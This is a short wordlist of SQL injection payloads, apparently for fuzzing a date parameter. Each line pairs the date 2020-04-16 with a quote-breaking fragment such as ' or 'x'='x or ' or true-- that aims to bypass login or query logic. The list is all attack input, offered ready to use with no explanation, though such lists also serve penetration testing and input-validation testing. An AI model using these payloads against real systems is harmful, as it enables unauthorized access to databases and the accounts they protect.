2020-04-16'-'
2020-04-16' '
2020-04-16'&'
2020-04-16'^'
2020-04-16'*'
2020-04-16' or ''-'
2020-04-16' or '' '
2020-04-16' or ''&'
2020-04-16' or ''^'
2020-04-16' or ''*'
2020-04-16"-"
2020-04-16" "
2020-04-16"&"
2020-04-16"^"
2020-04-16"*"
2020-04-16" or ""-"
2020-04-16" or "" "
2020-04-16" or ""&"
2020-04-16" or ""^"
2020-04-16" or ""*"
2020-04-16or true--
2020-04-16" or true--
2020-04-16' or true--
2020-04-16") or true--
2020-04-16') or true--
2020-04-16' or 'x'='x
2020-04-16') or ('x')=('x
2020-04-16')) or (('x'))=(('x
2020-04-16" or "x"="x
2020-04-16") or ("x")=("x
2020-04-16")) or (("x"))=(("x